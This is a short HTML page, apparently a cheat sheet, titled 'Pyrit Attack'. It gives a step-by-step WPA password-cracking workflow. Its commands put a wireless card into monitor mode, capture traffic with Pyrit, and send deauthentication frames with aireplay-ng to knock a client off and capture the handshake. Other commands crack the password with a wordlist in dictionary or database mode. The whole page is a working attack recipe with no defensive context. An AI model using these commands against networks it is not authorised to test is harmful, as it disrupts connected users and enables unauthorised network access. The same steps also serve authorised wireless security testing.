<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Pyrit Attack</title>
</head><body>Pyrit Attack<br/>
---------------<br/>
<br/>
Place your wireless card into monitor mode on the channel number of the AP:<br/>
<br/>
airmon-ng start &lt;interface&gt; &lt;AP channel&gt;<br/>
<br/>
Use Pyrit to sniff on the monitor mode interface, saving the capture to a file:<br/>
<br/>
pyrit -r &lt;interface&gt; -o &lt;capture&gt; stripLive<br/>
<br/>
Deauthenticate a connected client to force it to complete the 4-way handshake:<br/>
<br/>
aireplay-ng -0 1 -a &lt;AP MAC&gt; -c &lt;Client MAC&gt; &lt;interface&gt;<br/>
<br/>
Run Pyrit in dictionary mode to crack the WPA password:<br/>
<br/>
pyrit -r &lt;capture&gt; -i &lt;wordlist&gt; -b &lt;AP MAC&gt; attack_passthrough<br/>
<br/>
To use Pyrit in database mode, begin by importing your wordlist:<br/>
<br/>
pyrit -i &lt;wordlist&gt; import_passwords<br/>
<br/>
Add the ESSID of the access point to the Pyrit database:<br/>
<br/>
pyrit -e &lt;ESSID&gt; create_essid<br/>
<br/>
Generate the PMKs for the ESSID:<br/>
<br/>
pyrit batch<br/>
<br/>
Launch Pyrit in database mode to crack the WPA password:<br/>
<br/>
pyrit -r &lt;capture&gt; -b &lt;AP MAC&gt; attack_db</body></html>